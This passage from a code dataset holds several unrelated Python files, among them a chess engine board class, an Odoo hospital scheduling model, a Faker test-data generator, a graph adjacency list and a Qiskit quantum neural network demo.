[action,beta]\n\n if score > alpha: #alpha acts like max in minimax\n alpha = score\n bestAction = action \n \n return[bestAction,alpha] \n\n def alphaBetaMin(self,alpha,beta,depthleft,color):\n if depthleft == 0:\n return [[], -self.evaluate(color)]\n\n enemy = self.get_enemy(color)\n \n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n\n score = tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n if score <= alpha: #fail-hard alpha cutoff\n return [action,alpha]\n\n if score < beta: #beta acts like min in minimax\n beta = score\n bestAction = action \n \n return[bestAction,beta] \n \n def move(self, p1, p2):\n p1, p2 = p1.upper(), p2.upper()\n piece = self[p1]\n dest = self[p2]\n\n if (self[p1] is None):\n raise InvalidMove\n\n # print(\"1\", self[p1], piece.color)\n # print(\"2\", self[p2])\n\n # print(\"here we go sir\",self)\n\n if self.player_turn != piece.color:\n raise NotYourTurn(\"Not \" + piece.color + \"'s turn!\")\n\n enemy = self.get_enemy(piece.color)\n possible_moves = piece.possible_moves(p1)\n # 0. 
Check if p2 is in the possible moves\n if p2 not in possible_moves:\n raise InvalidMove\n\n #print(\"Possible Moves are\", possible_moves)\n\n # If enemy has any moves look for check\n if self.all_possible_moves(enemy):\n #x = self.all_possible_moves(enemy)\n #print(\"x is\")\n #print(x)\n if self.is_in_check_after_move(p1,p2):\n raise Check\n\n if not possible_moves and self.is_in_check(piece.color):\n raise CheckMate\n elif not possible_moves:\n raise Draw\n else:\n self._do_move(p1, p2)\n self._finish_move(piece, dest, p1,p2)\n\n def get_enemy(self, color):\n if color == \"white\": return \"black\"\n else: return \"white\"\n\n def _do_move(self, p1, p2):\n '''\n Move a piece without validation\n '''\n piece = self[p1]\n dest = self[p2]\n del self[p1]\n self[p2] = piece\n\n def _undo_move(self, p1,p2):\n '''\n Undo a Move\n\n '''\n piece = self[p2]\n dest = self[p1]\n del self[p2]\n self[p1] = piece \n\n def _finish_move(self, piece, dest, p1, p2):\n '''\n Set next player turn, count moves, log moves, etc.\n '''\n enemy = self.get_enemy(piece.color)\n if piece.color == 'black':\n self.fullmove_number += 1\n self.halfmove_clock +=1\n self.player_turn = enemy\n abbr = piece.abbriviation\n if abbr == 'P':\n # Pawn has no letter\n abbr = ''\n # Pawn resets halfmove_clock\n self.halfmove_clock = 0\n if dest is None:\n # No capturing\n movetext = abbr + p2.lower()\n else:\n # Capturing\n movetext = abbr + 'x' + p2.lower()\n # Capturing resets halfmove_clock\n self.halfmove_clock = 0\n\n self.history.append(movetext)\n\n\n def all_possible_moves(self, color):\n '''\n Return a list of `color`'s possible moves.\n Does not check for check.\n '''\n if(color not in (\"black\", \"white\")): raise InvalidColor\n result = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n if moves: result += moves\n\n # print(result) \n return result\n\n def occupied(self, color):\n '''\n Return a list of coordinates occupied by `color`\n '''\n result = []\n if(color not in (\"black\", \"white\")): raise InvalidColor\n\n for coord in self:\n if self[coord].color == color:\n result.append(coord)\n return result\n\n def is_king(self, piece):\n return isinstance(piece, pieces.King)\n\n\n def get_king_position(self, color):\n for pos in self.keys():\n if self.is_king(self[pos]) and self[pos].color == color:\n return pos\n\n def get_king(self, color):\n if(color not in (\"black\", \"white\")): raise InvalidColor\n return self[self.get_king_position(color)]\n\n def is_in_check(self, color):\n if(color not in (\"black\", \"white\")): raise InvalidColor\n king = self.get_king(color)\n enemy = self.get_enemy(color)\n return king in map(self.__getitem__, self.all_possible_moves(enemy))\n\n def letter_notation(self,coord):\n if not self.is_in_bounds(coord): return\n try:\n return self.axis_y[coord[1]] + str(self.axis_x[coord[0]])\n except IndexError:\n raise InvalidCoord\n\n def number_notation(self, coord):\n return int(coord[1])-1, self.axis_y.index(coord[0])\n\n def is_in_bounds(self, coord):\n if coord[1] < 0 or coord[1] > 7 or\\\n coord[0] < 0 or coord[0] > 7:\n return False\n else: return True\n\n def load(self, fen):\n '''\n Import state from FEN notation\n '''\n self.clear()\n # Split data\n fen = fen.split(' ')\n # Expand blanks\n def expand(match): return ' ' * int(match.group(0))\n\n fen[0] = re.compile(r'\\d').sub(expand, fen[0])\n\n for x, row in enumerate(fen[0].split('/')):\n for y, letter in enumerate(row):\n if letter == ' ': 
continue\n coord = self.letter_notation((7-x,y))\n self[coord] = pieces.piece(letter)\n self[coord].place(self)\n\n if fen[1] == 'w': self.player_turn = 'white'\n else: self.player_turn = 'black'\n\n self.castling = fen[2]\n self.en_passant = fen[3]\n self.halfmove_clock = int(fen[4])\n self.fullmove_number = int(fen[5])\n\n def export(self):\n '''\n Export state to FEN notation\n '''\n def join(k, g):\n if k == ' ': return str(len(g))\n else: return \"\".join(g)\n\n def replace_spaces(row):\n # replace spaces with their count\n result = [join(k, list(g)) for k,g in groupby(row)]\n return \"\".join(result)\n\n\n result = ''\n for number in self.axis_x[::-1]:\n for letter in self.axis_y:\n piece = self[letter+str(number)]\n if piece is not None:\n result += piece.abbriviation\n else: result += ' '\n result += '/'\n\n result = result[:-1] # remove trailing \"/\"\n result = replace_spaces(result)\n result += \" \" + (\" \".join([self.player_turn[0],\n self.castling,\n self.en_passant,\n str(self.halfmove_clock),\n str(self.fullmove_number)]))\n return result\n","sub_path":"chesslib/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":17309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162824094","text":"# -*- encoding:utf-8 -*-\nfrom datetime import datetime, timedelta\nimport time\nfrom odoo import api\nfrom odoo import fields, models\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\n\n\n\nclass RegisterPlan(models.Model):\n _name = 'his.register_plan'\n _description = '队列计划'\n\n medical_date = fields.Date('就诊日期')\n department_id = fields.Many2one('hr.department', '科室')\n employee_id = fields.Many2one('hr.employee', '医生')\n line_ids = fields.One2many('his.register_plan_line', 'register_plan_id', '就诊记录明细')\n schedule_id = fields.Many2one('his.work_schedule', '安排', ondelete='cascade')\n\n\n @api.model\n def generate_register_plan(self):\n \"\"\"根据号源表和预约有效天数产生挂号计划表\"\"\"\n\n # # 在每天0点运行该计划\n # hour = (datetime.now() + timedelta(hours=8)).hour\n # if hour != 0:\n # return\n\n work_schedule_obj = self.env['his.work_schedule'] # 挂号安排\n register_plan_line_obj = self.env['his.register_plan_line']\n department_obj = self.env['hr.department']\n clinic_item_category_obj = self.env['his.clinic_item_category']\n schedule_shift_obj = self.env['his.schedule_shift']\n register_source_obj = self.env['his.register_source']\n\n appoint_day = self.env.user.company_id.appoint_day # 预约有效天数\n\n today = datetime.strptime(datetime.now().strftime(DEFAULT_SERVER_DATE_FORMAT), DEFAULT_SERVER_DATE_FORMAT) # 当前日期\n\n last_day = today + timedelta(days=appoint_day)\n\n for work_schedule in work_schedule_obj.search([('date', '>=', today.strftime(DEFAULT_SERVER_DATE_FORMAT)), ('date', '<=', last_day.strftime(DEFAULT_SERVER_DATE_FORMAT)), ('is_generate_register_plan', '=', False), ('is_outpatient', '=', True)]):\n # 把工作计划的班次按科室分组\n departments = {}\n for shift in work_schedule.shifts:\n departments.setdefault(shift.department_id, []).append(shift)\n\n for department in departments:\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'employee_id': work_schedule.employee_id.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n shifts = sorted(departments[department], key=lambda x: x.start_time) # 班次\n for shift in shifts:\n for register_source in shift.register_source_ids:\n\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': 
medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n\n medical_sort += 1\n\n work_schedule.is_generate_register_plan = True\n\n # # 下周一的日期\n # today = datetime.strptime(datetime.today().strftime(DEFAULT_SERVER_DATE_FORMAT), DEFAULT_SERVER_DATE_FORMAT)\n # week = int(today.strftime('%w'))\n # next_week = today + timedelta(days=7 - week + 1)\n\n # 科室排班生成计划\n for department in department_obj.search([('is_shift', '=', True), ('is_outpatient', '=', False)]):\n clinic_item_category = clinic_item_category_obj.search([('department_id', '=', department.id)])\n if clinic_item_category:\n date = today + timedelta(days=clinic_item_category.max_days)\n date_str = date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n if work_schedule_obj.search([('department_id', '=', department.id), ('is_outpatient', '=', False), ('date', '=', date_str)]):\n continue\n\n work_schedule = work_schedule_obj.create({\n 'department_id': department.id,\n 'date': date_str,\n 'is_generate_register_plan': True,\n 'is_outpatient': False\n })\n week = date.strftime('%w')\n shifts = [shift for shift in department.shift_type_ids if shift.week_name == week]\n schedule_shifts = []\n for shift_type in shifts:\n schedule_shift = schedule_shift_obj.create({\n 'department_id': department.id,\n 'employee_id': False,\n 'schedule_id': work_schedule.id,\n 'shift_type_id': shift_type.id,\n 'start_time': shift_type.start_time,\n 'end_time': shift_type.end_time,\n 'register_time_interval': False,\n 'limit': shift_type.max_execute_count\n })\n schedule_shifts.append(schedule_shift)\n # 自动生成号源\n start = date + timedelta(hours=shift_type.start_time)\n end = date + timedelta(hours=shift_type.end_time)\n minute_interval = (\n shift_type.end_time * 60 - shift_type.start_time * 60) / shift_type.max_execute_count\n count = 1\n while start < end:\n register_source_obj.create({\n 'shift_id': schedule_shift.id,\n 'time_point_name': start.strftime('%H:%M'),\n 'department_id': department.id,\n 'employee_id': False,\n 'date': date_str,\n 'shift_type_id': shift_type.id\n })\n start += timedelta(minutes=int(minute_interval))\n if count >= shift_type.max_execute_count:\n break\n count += 1\n\n # 生成预约计划表\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n for shift in schedule_shifts:\n for register_source in shift.register_source_ids:\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n medical_sort += 1\n\n\n else:\n # 产生近一周的排班\n for i in range(7):\n # date = next_week + timedelta(days=i)\n date = today + timedelta(days=i)\n date_str = date.strftime(DEFAULT_SERVER_DATE_FORMAT)\n if work_schedule_obj.search([('department_id', '=', department.id), ('is_outpatient', '=', False), ('date', '=', date_str)]):\n continue\n\n work_schedule = work_schedule_obj.create({\n 'department_id': department.id,\n 'date': date_str,\n 'is_generate_register_plan': True,\n 'is_outpatient': False\n })\n week = date.strftime('%w')\n shifts = [shift for shift in department.shift_type_ids if shift.week_name == week]\n if not shifts:\n shifts = [shift for shift in department.shift_type_ids if not shift.week_name]\n\n\n schedule_shifts = []\n for shift_type in shifts:\n if not shift_type.max_execute_count:\n continue\n\n schedule_shift = 
schedule_shift_obj.create({\n 'department_id': department.id,\n 'employee_id': False,\n 'schedule_id': work_schedule.id,\n 'shift_type_id': shift_type.id,\n 'start_time': shift_type.start_time,\n 'end_time': shift_type.end_time,\n 'register_time_interval': False,\n 'limit': shift_type.max_execute_count\n })\n schedule_shifts.append(schedule_shift)\n # 自动生成号源\n start = date + timedelta(hours=shift_type.start_time)\n end = date + timedelta(hours=shift_type.end_time)\n minute_interval = (shift_type.end_time * 60 - shift_type.start_time * 60) / shift_type.max_execute_count\n count = 1\n overage = 0\n while start < end:\n register_source_obj.create({\n 'shift_id': schedule_shift.id,\n 'time_point_name': start.strftime('%H:%M'),\n 'department_id': department.id,\n 'employee_id': False,\n 'date': date_str,\n 'shift_type_id': shift_type.id\n })\n minutes, overage = divmod(minute_interval + overage, 1)\n start += timedelta(minutes=minutes)\n if count >= shift_type.max_execute_count:\n break\n count += 1\n time.sleep(1)\n\n\n # 生成预约计划表\n # 创建挂号计划主记录\n register_plan = self.create({\n 'medical_date': work_schedule.date,\n 'department_id': department.id,\n 'schedule_id': work_schedule.id\n })\n medical_sort = 1 # 预约序号\n for shift in schedule_shifts:\n for register_source in shift.register_source_ids:\n register_plan_line_obj.create({\n 'register_plan_id': register_plan.id,\n 'medical_sort': medical_sort,\n 'shift_type_id': shift.shift_type_id.id,\n 'time_point_name': register_source.time_point_name,\n })\n medical_sort += 1\n\n\n\nclass RegisterPlanLine(models.Model):\n _name = 'his.register_plan_line'\n _description = '挂号计划表明细'\n _order = 'id asc'\n\n register_plan_id = fields.Many2one('his.register_plan', '挂号计划', ondelete='cascade')\n medical_sort = fields.Integer('预约序号')\n shift_type_id = fields.Many2one('his.shift_type', '班次')\n time_point_name = fields.Char('时间点')\n partner_id = fields.Many2one('res.partner', '患者')\n source = fields.Selection([('manual', '人工挂号'), ('app', 'APP')], '来源')\n register_time = fields.Datetime('预约/挂号时间')\n reserve_time_point_name = fields.Char('预约时间点')\n register_id = fields.Many2one('his.register', 'HIS挂号记录')\n state = fields.Selection([], '状态')\n\n\n\n","sub_path":"his_app_hcfy/models/register_plan.py","file_name":"register_plan.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"204984054","text":"from faker import Faker\nimport json\n\nclass Student:\n \"\"\" creates a student \"\"\"\n def __init__(self, name, email, address, phone, social):\n self.name = name\n self.email = email\n self.address = address\n self.phone = phone\n self.social = social\n\n def __repr__(self):\n return f'Name: {self.name}\\n\\nEmail: {self.email} \\n\\nAddress: {self.address} \\n\\nPhone: {self.phone} \\n\\nSocial: {self.social} \\n\\n'\n\nclass School:\n \"\"\" creates a school \"\"\"\n def __init__(self, name):\n \"\"\" makes a school with a dictionary for fast access \"\"\"\n self.name = name\n self.students = dict()\n\n def new_student(self, name, email, address, phone, social):\n \"\"\" creates new student and adds it to school dictionary \"\"\"\n student = Student(name, email, address, phone, social)\n self.students[student.name] = student\n\n def list_students(self):\n \"\"\" list out students in school dictionary \"\"\"\n for kid in self.students:\n print(kid)\n\n def toJSON(self):\n return json.dumps(self, default=lambda o: o.__dict__, \n sort_keys=True, indent=4)\n\n def 
make_fake_school(self, amount):\n        \"\"\" generates multiple student objects with fake credentials and stores them as JSON in a text file \"\"\"\n        fake = Faker()\n        for i in range(1, amount+1):\n            name = fake.name()\n            address = fake.address()\n            phone = fake.numerify(text=\"(###)-###-####\")\n            social = fake.ssn()\n            email = fake.email()\n            self.new_student(name, email, address, phone, social)\n        with open(\"school.json\", \"w\") as f:\n            f.write(self.toJSON())\n","sub_path":"creator.py","file_name":"creator.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"130473320","text":"#!/usr/bin/python3\n\n# TPC2 -> Instead of split, use re.findall()\nimport fileinput\nimport re\n\t\ncounter = {}\t\n\nfor text in fileinput.input():\n\ttext = text.strip()\n\t\n\tlista = re.findall(r\"\\w+\",text)\n\n\tfor i in lista:\n\t\tif len(i) > 0:\n\t\t\tcounter[i] = counter.get(i,0) + 1\n\nfor key, val in sorted(counter.items(), key=lambda x : x[1], reverse=True):\n\tprint(key, ' - ', val)","sub_path":"SPLN/TPC/TPC2/findall.py","file_name":"findall.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"66413727","text":"from sqlalchemy import orm\n\nfrom flask_cot.db import db\nfrom flask_cot.db.mixins import TimestampMixin, CRUDMixin\n\n\nclass LeaderboardEntryDb(TimestampMixin, CRUDMixin, db.Model):\n    \"\"\"docstring for LeaderboardEntry.\"\"\"\n    __abstract__ = True\n    __base_tablename__ = 'leaderboard_entries'\n    id = db.Column(db.CHAR(36), nullable=False, primary_key=True)\n    leaderboard_id = db.Column(db.CHAR(36), nullable=True)\n    _dim_1 = db.Column(db.Integer(), nullable=True)\n    _dim_2 = db.Column(db.Integer(), nullable=True)\n    _dim_3 = db.Column(db.Integer(), nullable=True)\n    _dim_4 = db.Column(db.VARCHAR(255), nullable=True)\n    _dim_5 = db.Column(db.VARCHAR(255), nullable=True)\n    user_id = db.Column(db.CHAR(36), nullable=True)\n    display_name = db.Column(db.VARCHAR(255), nullable=True)\n    display_avatar = db.Column(db.VARCHAR(255), nullable=True)\n    score_a = db.Column(db.Integer(), nullable=False, default=0)\n    score_b = db.Column(db.Integer(), nullable=False, default=0)\n\n    def __repr__(self):\n        return '<LeaderboardEntryDb %s (%s)>' % (self.display_name, self.id)\n","sub_path":"leaderboards/models/db/leaderboard_entry.py","file_name":"leaderboard_entry.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"303076620","text":"'''\nDoes a few things. First, it counts the total number of the 4 orientations of read pairs (left-most first, ++, +-, -+, --). \nThis is Erez's in-in, in-out, out-in, out-out. 
Second, it counts the same for only read pairs with distances less than 2000 bp,\nand prints both sets of counts.\n'''\nfrom optparse import OptionParser\nimport gzip\n\ndef parse_options():\n\tparser = OptionParser()\n\tparser.add_option(\"-f\", \"--infile\", dest=\"filename\",\n\t\t\t\t\t help=\"input file: paired mapped\", metavar=\"INFILE\")\n\tparser.add_option(\"-o\", \"--outfile\", dest=\"outfile\",\n\t\t\t\t\t help=\"outfile stem\", metavar=\"OUTFILE\")\n\t(options, args) = parser.parse_args()\n\treturn options\n\n\n\noptions = parse_options()\npp_count = 0\npm_count = 0\nmp_count = 0\nmm_count = 0\nplus_plus = []\nplus_minus = []\nminus_plus = []\nminus_minus = []\n\nf = options.filename\nif (f[-2:] == 'gz'):\n\tinfile = gzip.open(f, 'rt')\nelse:\n\tinfile = open(options.filename,'r')\n\nfor line in infile:\n\titems = line.split()\n\tLmost_strand = ''\n\tRmost_strand = ''\n\tchr1 = items[2]\n\tchr2 = items[5]\n\tpos1 = int(items[3])\n\tpos2 = int(items[6])\n\tif (chr1 == chr2):\n\t\tsize = abs(pos1 - pos2)\n\t\tif (pos1 < pos2):\n\t\t\tLmost_strand = items[1]\n\t\t\tRmost_strand = items[4]\n\t\tif (pos1 > pos2):\n\t\t\tLmost_strand = items[4]\n\t\t\tRmost_strand = items[1]\n\t\t\n\t\tif (Lmost_strand == '+' and Rmost_strand == '+'):\n\t\t\tif(size < 2000): plus_plus.append(size)\n\t\t\tpp_count += 1\n\t\tif (Lmost_strand == '+' and Rmost_strand == '-'):\n\t\t\tif(size < 2000): plus_minus.append(size)\n\t\t\tpm_count += 1\n\t\tif (Lmost_strand == '-' and Rmost_strand == '+'):\n\t\t\tif(size < 2000): minus_plus.append(size)\n\t\t\tmp_count += 1\n\t\tif (Lmost_strand == '-' and Rmost_strand == '-'):\n\t\t\tif(size < 2000): minus_minus.append(size)\n\t\t\tmm_count += 1\n\ninfile.close()\n\nmax_pp = len(plus_plus)\nmax_pm = len(plus_minus)\nmax_mp = len(minus_plus)\nmax_mm = len(minus_minus)\n\nmax_entry = max(max_pp, max_pm, max_mp, max_mm)\n\n\nprint('2000 counts: ' + str(max_pp) + '\\t' + str(max_pm) + '\\t' + str(max_mp) + '\\t' + str(max_mm) + '\\n')\nprint('Total counts: ' + str(pp_count) + '\\t' + str(pm_count) + '\\t' + str(mp_count) + '\\t' + str(mm_count) + '\\n')\n","sub_path":"QC_4way_orientations.py","file_name":"QC_4way_orientations.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"425534718","text":"\"\"\"Implementation file for Fixed Wireless HSS ingest.\n\n\"\"\"\nimport os\nimport datetime\nfrom logga import log\n\nimport pyrob.common\nimport pyrob.loads.fixed_wireless_common\n\n\nclass Hss(pyrob.loads.fixed_wireless_common.Base):\n    \"\"\"HSS load implementation.\n\n    \"\"\"\n    def __init__(self, table=None, debug=False, dry=False):\n        \"\"\":class:`Hss` initialisation.\n\n        **Kwargs:**\n        *table*: :mod:`pyrob.schema.ipact_stg` table class mapping\n\n        *debug*: provide additional logging output (default ``False``)\n\n        *dry*: only report, do not execute (default ``False``)\n\n        \"\"\"\n        super(Hss, self).__init__(table=table, debug=debug, dry=dry)\n\n    @staticmethod\n    def global_elements(tree):\n        \"\"\"Handle global XML token values.\n\n        For parameters and return values, see\n        :meth:`extract_value_based_element`\n\n        \"\"\"\n        data = {}\n\n        nedn = None\n\n        nedn_elements = tree.xpath('./neid/nedn')\n        if len(nedn_elements):\n            nedn = nedn_elements[0].text\n\n        data['nedn'] = nedn\n\n        return data\n\n    def insert(self, process_id, 
bucket_size=10000, arraysize=10000):\n        insert_counter = 0\n        rows = []\n        counter = 0\n        for headers, results in self.source_remote_data(arraysize):\n            for row in results:\n                data = self.convert_columns(headers, row)\n\n                # Drop the unique-ifying column.\n                data.pop('dummy_id', None)\n\n                data['ipact_dl_process_id'] = process_id\n                data['record_created_date'] = datetime.datetime.utcnow()\n                data['record_created_userid'] = 105\n                rows.append(data)\n                counter += 1\n\n                if counter >= bucket_size:\n                    super(Hss, self).insert(rows)\n                    insert_counter += len(rows)\n                    counter = 0\n                    del rows[:]\n\n        # Get the laggards.\n        super(Hss, self).insert(rows)\n        insert_counter += len(rows)\n\n        return insert_counter\n","sub_path":"pyrob/loads/fixed_wireless/hss.py","file_name":"hss.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"506838269","text":"class node:\n    def __init__(self,data,next):\n        self.data=data\n        self.next=next\n\n    def has_next(self):\n        if self.next ==None:\n            return False\n        return True\n\nclass weighted_node:\n    \n    def __init__(self,data,next,weight):\n        self.data=data\n        self.next=next\n        self.weight=weight\n\n    def has_next(self):\n        if self.next == None:\n            return False\n        return True\n\nclass graph:\n    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Methods for external use~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n    # Constructor\n    def __init__(self,max_size,directed,weighted):\n        self.max_size=max_size\n        self.directed=directed\n        self.weighted=weighted\n        self.graph = self.initialize_graph()\n\n    #Add method for out of class use\n    def add(self,v1,v2,weight):\n        assert v1 < self.max_size and v2 < self.max_size\n        if self.weighted:\n            self.add_weighted(v1,v2,weight)\n        else:\n            self.add_unweighted(v1,v2)\n\n    #Print method for out of class use\n    def print_graph(self):\n        if self.weighted:\n            for x in range(len(self.graph)):\n                line_str = \"\"\n                line_str += f\"{x}: \"\n                currNode = self.graph[x]\n                currNode=currNode.next\n                while currNode != None:\n                    line_str += (f\"-> [Node: {currNode.data} - Weight: {currNode.weight}]\")\n                    currNode=currNode.next\n                line_str+=\"\\n\"\n                print(line_str)\n        else:\n            for x in range(len(self.graph)):\n                line_str = \"\"\n                line_str += f\"{x}: \"\n                currNode = self.graph[x]\n                currNode=currNode.next\n                while currNode != None:\n                    line_str += (f\"-> [Node: {currNode.data}]\")\n                    currNode=currNode.next\n                line_str+=\"\\n\"\n                print(line_str)\n    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Methods for internal use~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n    #Method to initialize the array of linked lists\n    def initialize_graph(self):\n        arr=[]\n        if self.weighted:\n            for x in range(self.max_size):\n                arr.append(weighted_node(None,None,None))\n        else:\n            for x in range(self.max_size):\n                arr.append(node(None,None))\n        return arr \n\n    #Connects 2 vertices with an unweighted edge\n    def connect_vertices_unweighted(self,v1,v2):\n        currNode = self.graph[v1]\n        while(currNode.has_next()):\n            currNode=currNode.next\n        currNode.next=node(v2,None)\n\n    #Connects 2 vertices with a weighted edge\n    def connect_vertices_weighted(self,v1,v2,weight):\n        currNode = self.graph[v1]\n        while(currNode.has_next()):\n            currNode=currNode.next\n        currNode.next=weighted_node(v2,None,weight)\n    \n    #Adds edge between 2 vertices with an unweighted edge\n    def add_unweighted(self,v1,v2):\n        #Connect v1 -> v2\n        self.connect_vertices_unweighted(v1,v2)\n        #Connects v2 -> v1 if graph is not directed\n        if not self.directed:\n            self.connect_vertices_unweighted(v2,v1)\n\n    #Adds edge between 2 vertices with a weighted edge\n    def add_weighted(self,v1,v2,weight):\n        #Connect v1 -> v2\n        self.connect_vertices_weighted(v1,v2,weight)\n        #Connects v2 -> v1 if graph is not directed\n        if not self.directed:\n            self.connect_vertices_weighted(v2,v1,weight)\n\n    
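# A minimal usage sketch (hypothetical, for illustration only; names follow the class above):\n    #   g = graph(3, directed=False, weighted=True)\n    #   g.add(0, 1, 5)\n    #   g.add(1, 2, 2)\n    #   g.print_graph()\n\n    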
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~","sub_path":"graph-algos/adjacency_list.py","file_name":"adjacency_list.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"160721563","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom torch import Tensor\nfrom torch.nn import Linear, CrossEntropyLoss, MSELoss\nfrom torch.optim import LBFGS\n\nfrom qiskit import Aer, QuantumCircuit\nfrom qiskit.utils import QuantumInstance\nfrom qiskit.opflow import AerPauliExpectation\nfrom qiskit.circuit import Parameter\nfrom qiskit.circuit.library import RealAmplitudes, ZZFeatureMap\nfrom qiskit_machine_learning.neural_networks import CircuitQNN, TwoLayerQNN\nfrom qiskit_machine_learning.connectors import TorchConnector\n\nqi = QuantumInstance(Aer.get_backend('statevector_simulator')) # Quantum Backend \n\n# Generate a simple random data set: \nnum_inputs = 2\nnum_samples = 20\nX = 2*np.random.rand(num_samples, num_inputs) - 1\ny01 = 1*(np.sum(X, axis=1) >= 0) # in { 0, 1}\ny = 2*y01-1 # in {-1, +1}\n\nX_ = Tensor(X)\ny01_ = Tensor(y01).reshape(len(y)).long()\ny_ = Tensor(y).reshape(len(y), 1)\n\nfor x, y_target in zip(X, y):\n if y_target == 1:\n plt.plot(x[0], x[1], 'bo')\n else:\n plt.plot(x[0], x[1], 'go')\nplt.plot([-1, 1], [1, -1], '--', color='black')\nplt.show()\n\n# set up QNN\nqnn1 = TwoLayerQNN(num_qubits=num_inputs, quantum_instance=qi)\n\n# set up PyTorch module\ninitial_weights = 0.1*(2*np.random.rand(qnn1.num_weights) - 1)\nmodel1 = TorchConnector(qnn1, initial_weights=initial_weights) \n\n# define optimizer and loss\noptimizer = LBFGS(model1.parameters())\nf_loss = MSELoss(reduction='sum')\n\n# start training\nmodel1.train() # set model to training mode\n\n# define objective function\ndef closure():\n optimizer.zero_grad() # initialize gradient\n loss = f_loss(model1(X_), y_) # evaluate loss function\n loss.backward() # backward pass\n print(loss.item()) # print loss\n return loss\n\n# run optimizer\noptimizer.step(closure)\n\n\n# evaluate model and compute accuracy\ny_predict = []\nfor x, y_target in zip(X, y):\n output = model1(Tensor(x))\n y_predict += [np.sign(output.detach().numpy())[0]]\n\nprint('Accuracy:', sum(y_predict == y)/len(y))\n\n# plot results\n# red == wrongly classified\nfor x, y_target, y_p in zip(X, y, y_predict):\n if y_target == 1:\n plt.plot(x[0], x[1], 'bo')\n else:\n plt.plot(x[0], x[1], 'go')\n if y_target != y_p:\n plt.scatter(x[0], x[1], s=200, facecolors='none', edgecolors='r', linewidths=2)\nplt.plot([-1, 1], [1, -1], '--', color='black')\nplt.show()","sub_path":"old/NN2.py","file_name":"NN2.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"249880784","text":"from PyQt4.QtGui import QFont, QHBoxLayout, QFrame\nfrom PyQt4 import QtCore\n\nmonospace_font = QFont('Monospace')\nmonospace_font.setStyleHint(QFont.TypeWriter)\n\nscript_file_filter = 'Coinscripts (*.coinscript);;Text files (*.txt);;All files (*.*)'\n\ndef floated_buttons(btns, left=False):\n \"\"\"Returns a HBoxLayout with buttons floated to the right or left.\"\"\"\n hbox = QHBoxLayout()\n for b in btns:\n hbox.addWidget(b)\n if left:\n hbox.addStretch(1)\n else:\n hbox.insertStretch(0, 1)\n return hbox\n\nclass Separator(QFrame):\n def __init__(self, parent=None):\n super(Separator, self).__init__(parent)\n self.setFrameShape(QFrame.HLine)\n 
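# HLine plus the raised shadow set below renders the separator as a 3D horizontal rule
        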
